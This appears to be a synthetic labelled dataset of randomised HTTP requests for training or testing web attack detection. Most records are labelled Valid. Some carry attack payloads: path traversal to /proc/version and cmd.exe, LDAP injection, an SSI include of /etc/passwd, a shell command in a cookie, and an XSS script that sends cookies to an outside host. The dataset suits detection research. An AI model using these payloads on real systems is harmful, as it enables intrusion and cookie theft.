Authorization: NTLM ZmllR2lGbnJpZDJlc3JvZTdocm5IMnJ0YTFiYXhIc2lvN2M=
Range: 802453-
Referer: /uoeNo/fsnegkra/nyboz.avi
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.9 (X11; U; SunOS sun4u 3.2; no-te; rv:8.5.1) Gecko/52870580
UA-CPU: 68000
UA-Disp: 436,0901,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 689x0740
Via: etcti/7.1 www.cudiT.png
Transfer-Encoding: compress
Upgrade: l8ino/0.2, geoi1/3.9, w1yf/3.0, dNna/4.3
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 113.222.226.64
X-Serial-Number: 79914989141850023
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30591
Start - Id: 28635
class: Valid
GET /Eoero/tlrmetvady.php3?lnreAeioda5Nr=5655473673&y7eg=n&1T4p5m3xnAso=P+y%28a&athslt5X=n%29oa2&o9tzhnmHSaqusc=ohy9ltrnH&dypdyMporciletn=se HTTP/1.0
Host: www.osnN.fr:55
Connection: keep-alive
Accept: image/gif;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 202.244.114.95
Cookie: neeha=u(wre7sgxp_a-%a;htaccesa4yr;qro=l;T5so=noi h;mNRoIs1assg=2;yL1tuTlhdlnAp=dcimvaeopLljistehu
Cookie2: $Version="335"
Date: Fri, 02 Dec 05 22:49:12 CET
ETag: "m61Hns7ULAUNoP7"
Expect: veRndioe=tfNemfiT
From: 6EaEszit@irni.st
If-Modified-Since: Mon, 16 Aug 04 21:27:57 CET
If-Unmodified-Since: Tue, 27 Apr 10 04:56:12 CET
If-Match: *
If-None-Match: "XC_EJ73I8t7K3C3"
If-Range: Thu, 07 Oct 04 13:09:39 GMT
Max-Forwards: 96
MIME-Version: 9.0
Pragma: hz4tid=9nst
Proxy-Authorization: Basic cnRtYjppTW9naDVz
Authorization: Basic NGFoUzplZHdo
Range: -5208,9131-01794,317-32381
Referer: /6seuA4as/7cnt.mdb
TE: chunked;q=0.8
Trailer: Date
User-Agent: u.O0-i3Z http://www.wasb.org
UA-CPU: 68000
UA-Disp: 8045,183,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 680x3732
Via: 8.0 247.196.118.135
Transfer-Encoding: gzip
Upgrade: Wtis/2.1, nat7E3/0.0, faaei/4.9, oas/2.1, fFtihs/4.5
Warning: 540 www.aacWusmD.jpeg "ehptcl" "Thu, 30 Mar 06 12:01:08 GMT"
X-Forwarded-For: 250.195.95.132
X-Serial-Number: 6114886940251
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28635
Start - Id: 21424
class: Valid
GET /pGr/M0EwT/awtP7W/ud7unwp1orwn96tu/efk9A5mQKDRfE_gtQQM/c6SMVMg8abgdvX1/E2rEle/ldi/utwzasplaltruu1Pq/esfGbcoy5V.4lOKI/ultob/ixNw5r41.jpeg?lsceTlnOlhean=t+%3Ase&_evaljBxp_w0T6P=45480349&yOHBoB@=u9q%3Btlse&aehnt=005&eboiL=eow&o8tdi25tecrenl=1164992&ruoin1tole=2533060518&utvEa=99 HTTP/1.1
Host: 139.210.62.66
Connection: close
Accept: text/plain;q=0.7, image/*, video/*
Accept-Charset: iso-8859-8-i;q=0.1, iso-2022-kr, hz-gb-2312, windows-1257;q=0.7
Accept-Encoding: deflate
Accept-Language: rau-5chr, iu-atcp;q=0.4, rsinCmg-8oro;q=0.7
Cache-Control: h1g8ndyw=da4iuseo
Client-ip: 150.44.219.251
Cookie: iesestbhqswi7i=7;oafiRtik=gZcY3H;atg4in8pe=ysatxloaefc;releiniss=yse;2RXZ=t 
Cookie2: $Version="85"
Date: Sun, 02 Aug 09 24:49:17 UTC
ETag: "nn7NGEr6jzML_H2"
Expect: mrae
From: unnd4yhe@pnsUaeitiH.biz
If-Modified-Since: Sun, 21 Mar 10 10:21:24 CET
If-Unmodified-Since: Thu, 27 Apr 06 18:55:45 GMT
If-Match: "3U1ZjyVrcBkmjaaRMC"
If-None-Match: "HtfQrP8RyRKTJGhc"
If-Range: *
Max-Forwards: 1814
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Digest response="Ac6eaF266Ca7B70FE5920F1FE64EFBf3"
Authorization: Digest cnonce="6srsm"
Range: 9389-552,913284-,86-
Referer: /iralie/sqtBzodi/lWvslD/paefcql/shshekky.jpeg
TE: gzip;q=0.8,gzip,trailers
Trailer: Max-Forwards
User-Agent: yWn7nd/5.3.6
UA-CPU: Sparc
UA-Disp: 425,9226,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: 9.7 27.94.250.107
Transfer-Encoding: gzip
Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 537 www.qAwwh9uW.css "huyeai3leuoqha7ci" "Sat, 07 Aug 04 03:47:33 CET"
X-Forwarded-For: 62.14.229.148
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21424
Start - Id: 15863
class: Valid
GET /d0e9aciaIpwvol/n2CTuBAmYLxFYgA5kZ/idservicesCinputX-aZmincludes-O/rx/oqZ2T0WcXkLZ9hBid/ejA.cfm?tiuIpdt=s8uchtaccesf&oirGcnhiyaEm=eEx9bem+altuzsja4&cm=140171388&5kss=s%27&5sjirhe3Rd=130140332&o8s3rus4haa=oQM3aOy&Hf=attvaYrectRmai&oilfi=lm&0winnt2c@a=t0v HTTP/1.0
Host: www.DeeMA.be
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.5
Cache-Control: max-age=69413
Client-ip: 127.204.91.129
Cookie: ysofasiJurei=ahxEB
Cookie2: $Version="71"
Date: Mon, 18 Feb 08 08:11:37 UTC
ETag: W/"RMcT4tkLPvog1osWLHoI"
Expect: 100-continue
From: ddet@hbn6tgsa.be
If-Modified-Since: Mon, 01 Oct 07 16:15:30 GMT
If-Unmodified-Since: Sat, 13 Dec 08 11:47:04 UTC
If-Match: "CyDQ4Maak7zRh0Ad"
If-None-Match: *
If-Range: Thu, 06 Dec 07 04:20:27 UTC
Max-Forwards: 55
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Basic bWRydTp4ZWRtb25n
Authorization: Digest opaque="snn4n"
Range: 33-,177768-
Referer: http://gnharsm.net/6rcipRel/zvgeis/ortrfa/eatg/xplwh.cgi
TE: trailers,trailers
Trailer: Warning
User-Agent: Puq5sdyetdCesnrm
UA-CPU: StrongARM
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7576x5405
Via: 7.8 www.r6nm4rb.html, 3.3 www.rbtp.jpeg, 1.9 140.78.245.54
Transfer-Encoding: compress
Upgrade: ae5a/2.7, top/0.4, ml19a/6.1, llc/5.5, otta/2.3
Warning: 000 242.230.25.115 "eTsTilafemtebeae" "Sat, 31 Oct 09 19:10:50 CET"
X-Forwarded-For: 27.123.98.19
X-Serial-Number: 11033805960306619864
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15863
Start - Id: 36360
class: PathTransversal
GET /dx.4vh7KcESryZN/paLAH/ifhewN/reehynmne9sfsYofvBoa/eKLgTAG/pc1auegsstisyqo/AYA/dntwlaBhe/s5saeehTSjid/FKmn.hzXPWDV.asmx?ithhagiaremnnt=nodea7Uperlttz+fy%2F%24&dttaient=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&se=r1y.A.1DWuUW&J1JrBtGF=xRYsdAC42&paAKqin=200&nToipathq=%3As&etSwtmtsph=3893&v7Ucmd%uAQM=+&mtiinpaseH=positionr%3B HTTP/1.1
Host: www.8zcctnad.st
Connection: close
Accept: */*
Accept-Charset: big5;q=0.3, euc-kr, macintosh;q=0.5, koi8-r, windows-1255
Accept-Encoding: 
Accept-Language: reflt5c-o;q=0.9, hhift-rxmkr2t, O-6aw1lsao;q=0.0, 2sz3tudu-teteLwdr, bedh-io
Cache-Control: max-age=73
Client-ip: 74.137.160.134
Cookie: lo9etstxsuueoii=44745446;emmlerSesfetdc=passwddec;edt=837;Oztsttteen7=3;mlgcee4waX=raccepteiguntiycr/at
Cookie2: $Version="486"
Date: Thu, 25 May 06 20:04:13 CET
ETag: W/"FVdxZvFAz4j68bNZ95W0"
Expect: eatl
From: sotSFlSe@qiksat.biz
If-Modified-Since: Tue, 10 Aug 04 06:25:39 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:20:53 GMT
If-Match: "Rll_MEez1Nm1-@4VHONL"
If-None-Match: *
If-Range: *
Max-Forwards: 9008
MIME-Version: 5.3
Pragma: ypgo=nl9i
Proxy-Authorization: Digest nonce
Authorization: Basic dDhhbmNydDpzb3Y0ZQ==
Range: 75-618834,757-411,77394-267269
Referer: /Hent/0Innoe.cfm
TE: gzip
Trailer: From
User-Agent: ngX8wAflY http://www.Le8h.de
UA-CPU: MIPS
UA-Disp: 930,1675,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6269x194
Via: 6.0 www.oseku9.gif:7801
Transfer-Encoding: deflate
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 864 193.255.239.241 "chohneoi" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36360
Start - Id: 37815
class: LdapInjection
GET /6SJA0E@q8r3Rqzpe/ryijitvtasrIhnhl.mspx?hbzt=i7YrcTRcrcxIcdoz&rwsmnuon=c3%29%28++%7C++++%28eb%3D*%29&vbiMa08xoeioe=qiuj&tqiduyuts6elnh=52BDlSuYM.dK&eeIf=idwheretrtin%25&qzva0yhatfloedt=oILwqx-F6xx&eess=m4tea&da=0007&8lcsrgtmlegmSe=5773648&eynRde4grtbomcd=c7tnph-&rte6aMedA=aYaiFz0Xec HTTP/1.1
Host: 95.175.236.218:42260
Connection: rorteP9m
Accept: */*;q=0.8
Accept-Charset: iso-8859-7;q=0.1, x-mac-japanese;q=0.3, x-mac-turkish, iso-8859-1
Accept-Encoding: deflate
Accept-Language: ehhNebah-tiIat;q=0.6, x-tmu, at-snt6c, onno6vdw-rZa;q=0.1, te6nrnwb-eloo
Cache-Control: no-transform
Client-ip: 76.169.84.54
Cookie: uogtr5dh1c=0Bwghmo4I;an3=r;pfrn=523;ae29T13B5nslu=rIoe
Cookie2: $Version="625"
Date: Sun, 08 Feb 04 02:33:00 UTC
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: soee=rrillw0;tfrta=vHins
From: inAltlp8@n6nlbheD8q.it
If-Modified-Since: Tue, 21 Dec 04 01:40:49 CET
If-Unmodified-Since: Thu, 19 Aug 04 03:33:24 CET
If-Match: "qZnicOCs84eIQrEPHP"
If-None-Match: "qdSIMPkMcHTsIBu"
If-Range: "byFR7tB7h29iTBYw"
Max-Forwards: 7696
MIME-Version: 0.8
Pragma: C0=n7dsDnm
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Digest uri=/eletca8/vlwdavo/nesazci8/tagecby5/cyiglo.aspx
Range: 3012-675
Referer: http://www.hq4hayb.uk/wassti/coeint/tdoirerd/2eDee/it3em.nsf
TE: deflate;q=0.2,chunked
Trailer: Pragma
User-Agent: Mozilla/5.5 (Machintosh; U; PPC 1.6; pe-zs; rv:2.5.8) Gecko/36635272
UA-CPU: x86
UA-Disp: 0815,794,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: 1.1 www.lineeNg.htm, 2.6 www.ieeznco.js:7
Transfer-Encoding: gzip
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37815
Start - Id: 33616
class: Valid
PUT /oc/aZD7lAt/ittyyu/l5aSNO/nl6we/50usabhweekr5MriaSo/m-SaQibwg1kx5hsEH/Smocha@OLWCPxN0dk/Eba/e0W1R2dS.qci/9P/CY.MXoa_06-we.jsp? HTTP/1.0
Content-Length: 177
Content-Language: Vesa,oa4n3yst,ata
Content-Encoding: deflate
Content-Location: http://www.arru.net/eegaiN/2ahaif.css
Content-MD5: bHVvMm9ldEVlYW1udHJJbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Oct 06 14:55:10 UTC
Last-Modified: Fri, 16 Jun 06 18:05:44 GMT
Host: 103.199.33.81:80
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: ls-rtoyal;q=0.9, Tp-baui;q=0.6, 1Dnekez-hmaRh;q=0.8, th1ns-G;q=0.5, etMieneR-oobau
Cache-Control: max-age=2030
Client-ip: 239.255.99.116
Cookie: r8yaes=491670;tbrewnetknse=xIrp
Cookie2: $Version="43"
Date: Fri, 13 May 05 14:17:49 UTC
Expect: lT4ye=brlne6
If-Modified-Since: Tue, 14 Oct 08 14:27:40 GMT
If-Unmodified-Since: Thu, 22 Jan 09 09:49:28 UTC
If-Match: "4bN97Jcb1OQRzH-"
If-None-Match: *
If-Range: Tue, 14 Sep 04 17:02:31 UTC
Max-Forwards: 023
MIME-Version: 8.4
Pragma: e=j
Authorization: eahlmn aderS=Ugn7mdh
Range: 409459-7,-297771
Referer: http://www.pi0dsqow.be/dltXab/qttes/teGg7t/elssr.bin
TE: deflate;q=0.3,trailers,trailers
User-Agent: evlgrc/5.0.0
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 468x6101
Via: 4.8 135.130.63.17, 5.3 www.Atve9Bfr.png, 0.2 www.nIOaei2e.jpeg
Transfer-Encoding: deflate
Warning: 832 www.ehihKame.gif "khIC0" 
X-Forwarded-For: 246.11.40.158
----: ----------------------------------------------

Ie3Eptarwsgnwna=vBKj6NOYkJb&dos8t0iy6los=yps0altauo5fo&1vSgm=457&t8lniiosiotOala=diyo4in&3gj.gsojkWLF=ttftpohocidi&h6we8sTnrs0=qUmei&Paes=0219&3rtnrot7=idrop&tdhptypfann=mocha4n

End - Id: 33616
Start - Id: 29131
class: Valid
GET /lhtpassqV-Bd/eoogeotrgifSIqre/dWfy10x.clL-0W/c5ecugFG4eWozm.jsp?ebshntntbsstnx=20584193&scripts75N5%uVLMxF=a+a%2Borcqdre&ITdnpsh9Rtelnet0=60&rN=654640865&tmbeOmIEat=lrwedocument7fer4uEao+&tmnI5silt=h%3Da0IwhudpA%7CeHU&aari5c=dewye&alyldaeiae=7MPQcD.x_fm.&t79sRaspI=ttonm&assamh=n%3Bg6neusrdivpassthru&Hz=oyeYlkaH8nnm HTTP/1.0
Host: www.sdhss1ena.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 186.234.179.68
Cookie: 3zzeosIaihldmy=nyeh5risigt
Cookie2: $Version="566"
Date: Fri, 28 Sep 07 24:39:13 CET
ETag: W/"B1-Hq3-tdE.0yKIGBz"
Expect: 9wpt=Fls4a
From: 9tlsAera@gi2n.org
If-Modified-Since: Thu, 13 Apr 06 04:15:59 UTC
If-Unmodified-Since: Mon, 06 Jun 05 20:20:36 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 13 Mar 09 16:00:28 GMT
Max-Forwards: 6183
MIME-Version: 3.3
Pragma: De3mrh='enioessS'
Proxy-Authorization: Basic ZWVhaHJBZjc6b2Vzbw==
Authorization: NTLM aWllY2lsRGhOaGhtd3A2bm9lcGRveXRyckxzbGJzYWhkaGVmdGVObW5rZw==
Range: 71-
Referer: http://www.ngrec.net/oljrti8v.txt
TE: deflate;q=0.1
Trailer: User-Agent
User-Agent: oas8ho8d (alEaFU)
UA-CPU: MIPS
UA-Disp: 8585,7282,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 466x304
Via: 1.2 www.eeeNnh.html, FTP/5.8 59.50.99.7:3692, FTP/7.8 167.46.206.177
Transfer-Encoding: gzip
Upgrade: ec9/9.0, tdi/9.7, rri/1.9, iedD92/0.3, piyrsf/0.2
Warning: 235 www.aliaS.js "ienttr9bl" 
X-Forwarded-For: 244.82.254.221
X-Serial-Number: 1881707
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 29131
Start - Id: 44056
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 40.202.176.8
Connection: close
Accept: application/x-tar;q=0.7
Accept-Charset: cp-936;q=0.2, iso-8859-8-i;q=0.7
Accept-Encoding: 
Accept-Language: ymdeuZ6-a, ra-skAoeps;q=0.8
Cache-Control: min-fresh=25162
Client-ip: 11.19.174.55
Cookie: HNN18pincludeO-Aob=65953;dG1P=nen3tyrn;eiso=36492;nibnh=n/ines2atNsh
Cookie2: $Version="43"
Date: Sun, 01 Feb 09 16:31:46 CET
ETag: W/"3JMdpZKPsFZtfWe4VBfh"
Expect: 9ngplMf=itmleued
From: ctHO@rsrvtl.cz
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Tue, 27 Jan 04 20:34:39 UTC
If-Match: *
If-None-Match: "_fd0fyKesV3Tnmi"
If-Range: Fri, 19 Nov 04 23:56:07 GMT
Max-Forwards: 1
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: osLn 3ee8aia=uEephmnw
Range: -0
Referer: http://imfbe.fr/a2pn/sisk/1Knu.cfm
TE: trailers,chunked
Trailer: If-Range
User-Agent: Mozilla/6.7 (Machintosh; U; Mac OS X 2.8; Ew-oe; rv:5.8.4) Gecko/72990800
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: HTTP/7.1 15.255.155.128, 5.6 www.5nubSctu.jpg
Transfer-Encoding: compress
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 201.145.60.10
X-Serial-Number: 412280187
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44056
Start - Id: 26669
class: Valid
GET /lyuYD3nI_m@/c.uXlkuKistlyFejUG0R/YurAnlitss/t2sr/nCc4vE/rKoTn2vXuOi4sN/dP/iAGjY3a19/e72._g4fJfaSXXc1/tT93Q@MvgEf/sg4/telnethfVpzUOH.cfm?dnhH=nt&o2=roicbanevqvTbstra&etsnihta5=020489193&htnR3htEl=sHrpr4esB&KllgnwgetIbinnph-=boot.ini%40cathtpasssee%3Cnds7r&cURpse6i6=oo0n&HYunion7rV=6791&qt0eAri=tioeel&tkiyiO5n6=xe3Voih4sesew&featDv=4eme6 HTTP/1.0
Host: 102.146.131.61:80
Connection: keep-alive
Accept: video/*;q=0.9
Accept-Charset: hz-gb-2312, euc-kr, x-mac-arabic, utf-7
Accept-Encoding: gzip, compress;q=0.2, identity;q=0.1
Accept-Language: mte-slx;q=0.6, leGt-YartooS, t-13;q=0.5, eizEntr7-tt6a
Cache-Control: no-store
Client-ip: 83.84.179.173
Cookie: ebs0tnqatt=ioWincludeNct;Thome7k@QF7IKd=sasg ew]wp-;nrbQyanieen=65608671;enoiao3tneEcnu=n>cPal
Cookie2: $Version="931"
Date: Mon, 27 Apr 09 21:54:03 CET
ETag: W/"sCWd9J6@y1dr6qNtBNG"
Expect: eetKr7E
From: aenrotes@hoereselr.be
If-Modified-Since: Sun, 01 May 05 10:33:25 UTC
If-Unmodified-Since: Mon, 30 Jun 08 04:49:21 UTC
If-Match: *
If-None-Match: "6BADGAt7ULUc3LMyix43"
If-Range: "EupSXhfaJWeDNg9"
Max-Forwards: 6
MIME-Version: 7.8
Pragma: sl=e
Proxy-Authorization: Digest response="24ebD5f3BCcCec4f689DAfd20DcADAf6"
Authorization: Basic eWFlaTpjbWVh
Range: -484069,7417-956,-660654
Referer: /hcoerdL.dll
TE: trailers,deflate;q=0.6,deflate;q=0.1
Trailer: Via
User-Agent: 8ttennIjxt (cfTBvxYejH; sgAWLMex3u; hKz_X2G8o; sxhj1fhIG)
UA-CPU: PowerPC
UA-Disp: 0736,120,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 190x433
Via: 6.4 www.yiryPli.png
Transfer-Encoding: identity
Upgrade: dss/7.0, hee/2.6, eu9/8.4, uieiTe/9.3, ynTjo4/4.2
Warning: 647 www.73orh.js "6zehdei0repaoct" "Sun, 20 Nov 05 12:22:26 GMT"
X-Forwarded-For: 219.199.45.244
X-Serial-Number: 85340916492
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26669
Start - Id: 27068
class: Valid
GET /eooeXuteisz9nd9e/iR3v/i3l.gif?nVsiNohCUn=921843&6EfTOjbetweeno=03&ZC4byQ7tNPI=0&e3de=47905&n1RRdnohpzct=i%3Au&t8evti=148976&rdnnes=69672412&dqsp=86013724&eeEO=enb&eoasmuwNtrt=n&reeinszc1ecret=a-6Kn&te9lAetn=0mistelnetnmecypstposition%26%3D&Tcnba=hae HTTP/1.1
Host: 147.255.158.104
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: i1mr6em-7ii, aldnMl-dd
Cache-Control: min-fresh=0
Client-ip: 247.155.95.247
Cookie: sptaz=u57DiLhw;dhd7n=690
Cookie2: $Version="764"
Date: Mon, 29 Sep 08 01:41:43 CET
ETag: "V8DY8gKc@gCxffLq"
Expect: Pdooxti=q8vaaeat;es4etyb=clerresw
From: 3otibe7a@MlsoOs8in.gov
If-Modified-Since: Sat, 14 Oct 06 01:04:58 GMT
If-Unmodified-Since: Sat, 09 Jun 07 10:10:26 CET
If-Match: *
If-None-Match: *
If-Range: "V4aI3jom3tcuAsd2p"
Max-Forwards: 138
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic aGVlZW9pOnJmT2h1
Authorization: Digest qop=b5qCe
Range: 911-8
Referer: /ro7ccd/ettbe/hnbNle/tbsf4sm/Paodh.msf
TE: trailers
Trailer: Connection
User-Agent: tszoxhan (hf9xp5095; hJ9EbM4; oNxfEp; tIVmpH@5Q; ey38Z6)
UA-CPU: x86
UA-Disp: 2539,8756,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 929x150
Via: utw/6.8 www.ea6mt.shtml:4586
Transfer-Encoding: assi; tliS=9vceo
Upgrade: yttNQh/3.9, yfpi4i/1.8, lhrs/6.3, setd/4.5, Eye/5.3
Warning: 122 www.yssacdsa.gif "Acidea" "Thu, 21 Jan 10 17:16:57 CET"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 0883782422223319
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 27068
Start - Id: 39730
class: SSI
GET /1dsooeouaulNsaus.htm?RtmpA4=%3C%21--+++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E&eDnn=6+e56ez+&uvhogo5pnyes4p=ualfc+&earwrmAeeitS=440&shsEsme=iAetv HTTP/1.1
Host: www.1sEisS.st
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.4, identity;q=0.1, identity;q=0.4
Accept-Language: br-ar9ep;q=0.4, env-h, aestne-3if;q=0.8
Cache-Control: max-stale=5552
Client-ip: 55.223.250.116
Cookie: ktnna=5@JHgyCGc
Cookie2: $Version="7"
Date: Thu, 24 May 07 23:39:56 UTC
ETag: "RpokNe@hiUrDxRmesWrO"
Expect: 100-continue
From: iltkt32@r7Muj.it
If-Modified-Since: Tue, 23 Aug 05 15:39:37 UTC
If-Unmodified-Since: Mon, 24 May 04 12:13:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 4.8
Pragma: nh9eh=aWi
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: Digest cnonce="o0Rwteea"
Range: -58,-7,-12255
Referer: /sozut/n4gm9egp/pels/news/sndjetf.cgi
TE: trailers,chunked;q=0.2,trailers
Trailer: Host
User-Agent: Mozilla/0.7 (Windows; U; Win98 2.1; nr-rs; rv:2.5.8) Gecko/86183283
UA-CPU: x86
UA-Disp: 9987,6027,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 602x675
Via: 5.5 248.58.121.185, 0.5 235.82.229.117, 6.6 www.ten5.js
Transfer-Encoding: identity
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 878025809262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39730
Start - Id: 43656
class: OsCommanding
PUT /zlslytfz/uswg0Uhl/av8cZ53PftFf/u2eercrrcdGebmahcuu/35pmhxidteaoty3ia/sP2QwG7@GzZo@0qpFO4u/Teets/n6/xmlEjfuW/vpqove.jpg? HTTP/1.1
Content-Length: 239
Content-Language: h,na,5etGBl
Content-Encoding: gzip
Content-Location: /T4oyxlo/rso9enm/mpin.asp
Content-MD5: dHJwc3luYnVhN0hybGd0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Aug 04 08:51:33 GMT
Last-Modified: Sat, 23 May 09 03:10:22 CET
Host: 162.172.188.183
Connection: close
Accept: application/x-tar;q=0.4, image/*
Accept-Charset: cp-950, windows-1251, euc-tw, big5, windows-874;q=0.6
Accept-Encoding: identity
Accept-Language: rhIessP-5a, mesbnaS-mprb, 9aheHa-eielnip;q=0.9
Cache-Control: yth=wmasAa
Cookie: eeAcs3Aflm=1;miacwVGTBrgK=\nls   /root/
Cookie2: $Version="00"
Date: Sun, 27 Mar 05 21:33:21 UTC
ETag: "eXXMSCnK5ut3Qp6Rw4mE"
Expect: 100-continue
If-Modified-Since: Sat, 09 Jul 05 15:01:18 GMT
If-Unmodified-Since: Tue, 02 May 06 19:34:47 CET
If-Match: "vLngfyRJj3XbWl@QjN"
If-None-Match: *
Max-Forwards: 0
Pragma: a7='M4ni9q'
Proxy-Authorization: Digest username="tdtcrv"
Authorization: Basic dG5hdzpsQ3RvaGk=
Range: 932-
Referer: http://nlkcalsc.gov/6ese/ieOa/deesThin/ghzRiy.conf
TE: chunked;q=0.9,trailers,gzip;q=0.3
User-Agent: hesmydnnDoA2lynsy
UA-OS: Mac OS X
Via: amaa/3.8 99.245.113.93:735, FTP/5.0 www.rhru.js
Transfer-Encoding: deflate
Warning: 867 58.11.138.219:30400 "065Imosn" 
X-Forwarded-For: 199.96.60.124
X-Serial-Number: 9200582

ocnrhuhzoai7n=e&hlhmuhEi=;iaxp_creplacep-ioaan&ls=ipA&zbdfkofsrl=4&4r2o4r8tluns=eemailt&_0cPxp_position@M=Iedseo&Wh0EaAcve-=eR9bodya ar9cmnag&oepnaua1hft=  q simBmngroup bysialink&eJii=2676&Nnefrsgnoyoh=o9i/1r9gi&crNhios4e=/%hlink 

End - Id: 43656
Start - Id: 48210
class: XSS
POST /i5n3KWuqx7Kf.asp? HTTP/1.1
Content-Length: 57
Content-Language: ianhe7
Content-Encoding: gzip
Content-Location: http://a2ltZd.com/errie/ssnrea/aeegee.jpg
Content-MD5: emVsNm44ZGFzb250MXhlQw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Jan 08 23:20:40 GMT
Last-Modified: Thu, 01 Nov 07 04:37:29 UTC
Host: 162.74.135.21:6595
Connection: 9jheA9
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.4, identity, gzip;q=0.3
Accept-Language: cd-eEvsdn, 1-3w;q=0.6
Cache-Control: max-stale
Client-ip: 188.123.167.43
Cookie: eiWlvtC0ksap=hn9weeaoeKddawt;ynniDkndMaorncs=l6NU;sneslenEaeiiO=includeiy;eeqAewha3eE8f= b5sju9/Hors7e Ed ;raeSpeiEeea=31579785
Cookie2: $Version="5"
Date: Wed, 19 Oct 05 07:56:27 CET
ETag: W/"JkNm7sD6l4qVMEyYQ5ri"
Expect: 100-continue
From: kTOsae7a@Lnatniube.cz
If-Modified-Since: Sat, 04 Apr 09 14:05:16 CET
If-Unmodified-Since: Wed, 09 Jan 08 05:32:27 GMT
If-Match: *
If-None-Match: "-JeeQkIneJBvcnuG_j"
If-Range: Sat, 17 May 08 17:05:07 CET
Max-Forwards: 6
MIME-Version: 6.3
Pragma: esSm=eltioIo
Proxy-Authorization: Digest cnonce="ccntio"
Authorization: Digest realm
Range: 9-78819
Referer: /niar/t6gl/a0gbs/dmeema.gz
TE: gzip,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: &<script  >[document.location.replace('http://www.re.com/cgi-bin/liasni.cgi'+document.cookie);]</script   >
UA-Disp: 5215,325,8
UA-Color: color32
UA-Pixels: 2557x0166
Via: FTP/1.1 www.erws.js, 1.9 www.lybsdere.htm, 3.8 www.duszjamh.html
Transfer-Encoding: srhdm1; hyTkey=nlfer8
Warning: 893 78.20.40.155 "h9rlthiE7eebet5grc" 
X-Forwarded-For: 16.22.84.83
